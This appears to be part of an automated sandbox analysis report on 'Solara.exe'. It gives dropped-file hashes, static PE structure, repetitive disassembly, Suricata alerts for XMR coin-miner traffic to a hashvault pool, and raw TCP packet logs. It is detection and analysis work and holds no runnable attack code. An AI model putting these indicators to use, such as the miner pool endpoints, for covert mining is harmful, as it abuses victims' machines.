                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Windows\Temp\__PSScriptPolicyTest_2244occl.ell.ps1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Windows\Temp\__PSScriptPolicyTest_avz31ups.rid.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Windows\Temp\__PSScriptPolicyTest_gdpp1jfj.vju.psm1

                                                                                                  Download File
                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                  C:\Windows\Temp\ypynqohyxqjk.sys

                                                                                                  Download File
                                                                                                  Process:C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe
                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):14544
                                                                                                  Entropy (8bit):6.2660301556221185
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                  MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                  SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                  SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                  SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                  Malicious:true
                                                                                                  Antivirus:
                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                                                  Static File Info

                                                                                                  General

                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Entropy (8bit):7.995071480993302
                                                                                                  TrID:
                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                  File name:Solara.exe
                                                                                                  File size:14'390'272 bytes
                                                                                                  MD5:cc6d7a6b17febe201b7f7d26ce944c08
                                                                                                  SHA1:231e8439c0facca7cc4b730bf950351d48e3a7c2
                                                                                                  SHA256:b1883486b5e6da993af6deb6f4d0f524ccdc6317bdc32ed50dccd1799867a3bd
                                                                                                  SHA512:c2abd5a8a59e09951df3d17b591442097cb2615a57abbef9afee9660dcd59ece483ca9a6ab4e83a622235eef4c75ef64dc2b32b58829cef8c485e1517e9ba652
                                                                                                  SSDEEP:393216:KsEANEX3gBGYVwwoE0VhUqE7SlO9h4m/a360m:KhIEX3kGN/XBEWs4EA60m
                                                                                                  TLSH:6DE6337007A4C5CFD7844BF98581BA78B878CAE5B822FAC57D2E75D8992134C2CD6E4C
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Hhg.................j...(......>.... ........@.. ....................................@................................

                                                                                                  File Icon

                                                                                                  Icon Hash:f0e1e4f0d8e972c3

                                                                                                  Static PE Info

                                                                                                  General

                                                                                                  Entrypoint:0x117883e
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x676848DC [Sun Dec 22 17:14:04 2024 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:v4.0.30319
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                  Entrypoint Preview

                                                                                                  Instruction
                                                                                                  jmp dword ptr [00402000h]
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al

                                                                                                  Data Directories

                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xd787e80x53.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xd7a0000x4259c.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xdbe0000xc.reloc
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                  Sections

                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x20000xd768440xd76a00b86e10d7f696482688377d459d00c7b8unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .rsrc0xd7a0000x4259c0x426000b1fce832b0a653efc0e29865ab321e9False0.3729585981638418data5.623945089143449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .reloc0xdbe0000xc0x20031c1452d083fe81a07085e801843b705False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                  Resources

                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  RT_ICON0xd7a1300x42028Device independent bitmap graphic, 256 x 512 x 32, image size 2621440.3722519750273693
                                                                                                  RT_GROUP_ICON0xdbc1580x14data0.9
                                                                                                  RT_VERSION0xdbc16c0x244data0.4706896551724138
                                                                                                  RT_MANIFEST0xdbc3b00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                                                  Imports

                                                                                                  DLLImport
                                                                                                  mscoree.dll_CorExeMain

                                                                                                  Network Behavior

                                                                                                  Suricata IDS Alerts

                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                  2025-01-12T07:10:24.458989+01002826930ETPRO COINMINER XMR CoinMiner Usage2192.168.2.74985780.240.16.67443TCP
                                                                                                  2025-01-12T07:10:50.120905+01002036289ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)2192.168.2.7622301.1.1.153UDP

                                                                                                  Network Port Distribution

                                                                                                  TCP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 12, 2025 07:10:50.130175114 CET49857443192.168.2.780.240.16.67
                                                                                                  Jan 12, 2025 07:10:50.130215883 CET4434985780.240.16.67192.168.2.7
                                                                                                  Jan 12, 2025 07:10:50.130271912 CET49857443192.168.2.780.240.16.67
                                                                                                  Jan 12, 2025 07:10:50.130491972 CET49857443192.168.2.780.240.16.67
                                                                                                  Jan 12, 2025 07:10:50.130508900 CET4434985780.240.16.67192.168.2.7
                                                                                                  Jan 12, 2025 07:10:50.819168091 CET4434985780.240.16.67192.168.2.7
                                                                                                  Jan 12, 2025 07:10:50.821005106 CET49857443192.168.2.780.240.16.67
                                                                                                  Jan 12, 2025 07:10:50.821018934 CET4434985780.240.16.67192.168.2.7
                                                                                                  Jan 12, 2025 07:10:50.822875023 CET4434985780.240.16.67192.168.2.7
                                                                                                  Jan 12, 2025 07:10:50.822952032 CET49857443192.168.2.780.240.16.67
                                                                                                  Jan 12, 2025 07:10:50.824537039 CET49857443192.168.2.780.240.16.67
                                                                                                  Jan 12, 2025 07:10:50.824610949 CET4434985780.240.16.67192.168.2.7
                                                                                                  Jan 12, 2025 07:10:50.873631954 CET49857443192.168.2.780.240.16.67
                                                                                                  Jan 12, 2025 07:10:50.873639107 CET4434985780.240.16.67192.168.2.7
                                                                                                  Jan 12, 2025 07:10:50.982975960 CET49857443192.168.2.780.240.16.67
                                                                                                  Jan 12, 2025 07:10:51.143615961 CET4434985780.240.16.67192.168.2.7
                                                                                                  Jan 12, 2025 07:10:51.186113119 CET49857443192.168.2.780.240.16.67
                                                                                                  Jan 12, 2025 07:11:01.103049040 CET4434985780.240.16.67192.168.2.7
                                                                                                  Jan 12, 2025 07:11:01.186180115 CET49857443192.168.2.780.240.16.67
                                                                                                  Jan 12, 2025 07:11:09.416131973 CET4434985780.240.16.67192.168.2.7
                                                                                                  Jan 12, 2025 07:11:09.576869965 CET49857443192.168.2.780.240.16.67
                                                                                                  Jan 12, 2025 07:11:17.868184090 CET4998280192.168.2.7208.95.112.1
                                                                                                  Jan 12, 2025 07:11:17.873063087 CET8049982208.95.112.1192.168.2.7
                                                                                                  Jan 12, 2025 07:11:17.873158932 CET4998280192.168.2.7208.95.112.1
                                                                                                  Jan 12, 2025 07:11:17.874192953 CET4998280192.168.2.7208.95.112.1
                                                                                                  Jan 12, 2025 07:11:17.879093885 CET8049982208.95.112.1192.168.2.7
                                                                                                  Jan 12, 2025 07:11:18.338527918 CET8049982208.95.112.1192.168.2.7
                                                                                                  Jan 12, 2025 07:11:18.351532936 CET4998280192.168.2.7208.95.112.1
                                                                                                  Jan 12, 2025 07:11:18.356682062 CET8049982208.95.112.1192.168.2.7
                                                                                                  Jan 12, 2025 07:11:18.360771894 CET4998280192.168.2.7208.95.112.1
                                                                                                  Jan 12, 2025 07:11:27.260097027 CET49983443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:27.260126114 CET44349983162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:27.260210991 CET49983443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:27.261075020 CET49983443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:27.261089087 CET44349983162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:27.742584944 CET44349983162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:27.743201017 CET49983443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:27.743210077 CET44349983162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:27.744371891 CET44349983162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:27.744432926 CET49983443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:27.745337009 CET49983443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:27.745515108 CET44349983162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:27.745695114 CET49983443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:27.745702982 CET44349983162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:27.745809078 CET49983443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:27.787322998 CET44349983162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:27.956113100 CET44349983162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:27.956233978 CET44349983162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:27.956285954 CET49983443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:27.957736015 CET49983443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:27.957751989 CET44349983162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:27.959559917 CET49984443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:27.959599972 CET44349984162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:27.959695101 CET49984443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:27.960196018 CET49984443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:27.960210085 CET44349984162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:28.450489998 CET44349984162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:28.450998068 CET49984443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:28.451016903 CET44349984162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:28.452076912 CET44349984162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:28.452145100 CET49984443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:28.453103065 CET49984443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:28.453176022 CET44349984162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:28.453365088 CET49984443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:28.453372002 CET44349984162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:28.453461885 CET49984443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:28.499322891 CET44349984162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:28.660053968 CET44349984162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:28.660201073 CET44349984162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:28.660252094 CET49984443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:28.661653042 CET49984443192.168.2.7162.159.134.233
                                                                                                  Jan 12, 2025 07:11:28.661672115 CET44349984162.159.134.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:28.663947105 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:28.663992882 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:28.664063931 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:28.664592981 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:28.664608955 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.136555910 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.144351959 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.144366980 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.145423889 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.145495892 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.155828953 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.155941963 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.163055897 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.163074017 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.222625971 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.222687006 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.222847939 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.222884893 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.223000050 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.223030090 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.223130941 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.223207951 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.223242998 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.223499060 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.223534107 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.223707914 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.223746061 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.223759890 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.223766088 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.223906994 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.223927021 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.223954916 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.223969936 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.223978996 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.224106073 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.224153042 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.224181890 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.233427048 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.233628988 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.233659983 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.233683109 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.233714104 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.233717918 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.233733892 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.233753920 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:29.233819008 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:29.238651991 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:30.091965914 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:30.092107058 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:30.092159986 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:30.093244076 CET49985443192.168.2.7162.159.135.233
                                                                                                  Jan 12, 2025 07:11:30.093256950 CET44349985162.159.135.233192.168.2.7
                                                                                                  Jan 12, 2025 07:11:30.581722975 CET49990443192.168.2.751.91.7.6
                                                                                                  Jan 12, 2025 07:11:30.581811905 CET4434999051.91.7.6192.168.2.7
                                                                                                  Jan 12, 2025 07:11:30.581876993 CET49990443192.168.2.751.91.7.6
                                                                                                  Jan 12, 2025 07:11:30.582484961 CET49990443192.168.2.751.91.7.6
                                                                                                  Jan 12, 2025 07:11:30.582520008 CET4434999051.91.7.6192.168.2.7
                                                                                                  Jan 12, 2025 07:11:31.209825039 CET4434999051.91.7.6192.168.2.7
                                                                                                  Jan 12, 2025 07:11:31.210392952 CET49990443192.168.2.751.91.7.6
                                                                                                  Jan 12, 2025 07:11:31.210442066 CET4434999051.91.7.6192.168.2.7
                                                                                                  Jan 12, 2025 07:11:31.211519957 CET4434999051.91.7.6192.168.2.7
                                                                                                  Jan 12, 2025 07:11:31.211601973 CET49990443192.168.2.751.91.7.6
                                                                                                  Jan 12, 2025 07:11:31.212558985 CET49990443192.168.2.751.91.7.6
                                                                                                  Jan 12, 2025 07:11:31.212640047 CET4434999051.91.7.6192.168.2.7
                                                                                                  Jan 12, 2025 07:11:31.212917089 CET49990443192.168.2.751.91.7.6
                                                                                                  Jan 12, 2025 07:11:31.212935925 CET4434999051.91.7.6192.168.2.7
                                                                                                  Jan 12, 2025 07:11:31.389405966 CET49990443192.168.2.751.91.7.6
                                                                                                  Jan 12, 2025 07:11:31.455667019 CET4434999051.91.7.6192.168.2.7
                                                                                                  Jan 12, 2025 07:11:31.455769062 CET4434999051.91.7.6192.168.2.7
                                                                                                  Jan 12, 2025 07:11:31.455827951 CET49990443192.168.2.751.91.7.6
                                                                                                  Jan 12, 2025 07:11:31.456574917 CET49990443192.168.2.751.91.7.6
                                                                                                  Jan 12, 2025 07:11:31.456617117 CET4434999051.91.7.6192.168.2.7
                                                                                                  Jan 12, 2025 07:11:31.509738922 CET4434985780.240.16.67192.168.2.7
                                                                                                  Jan 12, 2025 07:11:31.576935053 CET49857443192.168.2.780.240.16.67
                                                                                                  Jan 12, 2025 07:11:31.901527882 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:31.901571989 CET4434999145.112.123.227192.168.2.7
                                                                                                  Jan 12, 2025 07:11:31.901704073 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:31.902328968 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:31.902350903 CET4434999145.112.123.227192.168.2.7
                                                                                                  Jan 12, 2025 07:11:32.544842005 CET4434999145.112.123.227192.168.2.7
                                                                                                  Jan 12, 2025 07:11:32.545384884 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:32.545404911 CET4434999145.112.123.227192.168.2.7
                                                                                                  Jan 12, 2025 07:11:32.546940088 CET4434999145.112.123.227192.168.2.7
                                                                                                  Jan 12, 2025 07:11:32.547087908 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:32.548650980 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:32.548650980 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:32.548798084 CET4434999145.112.123.227192.168.2.7
                                                                                                  Jan 12, 2025 07:11:32.548826933 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:32.549396992 CET49991443192.168.2.745.112.123.227
                                                                                                  Jan 12, 2025 07:11:32.549412966 CET4434999145.112.123.227192.168.2.7
                                                                                                  Jan 12, 2025 07:11:32.549530029 CET49991443192.168.2.745.112.123.227
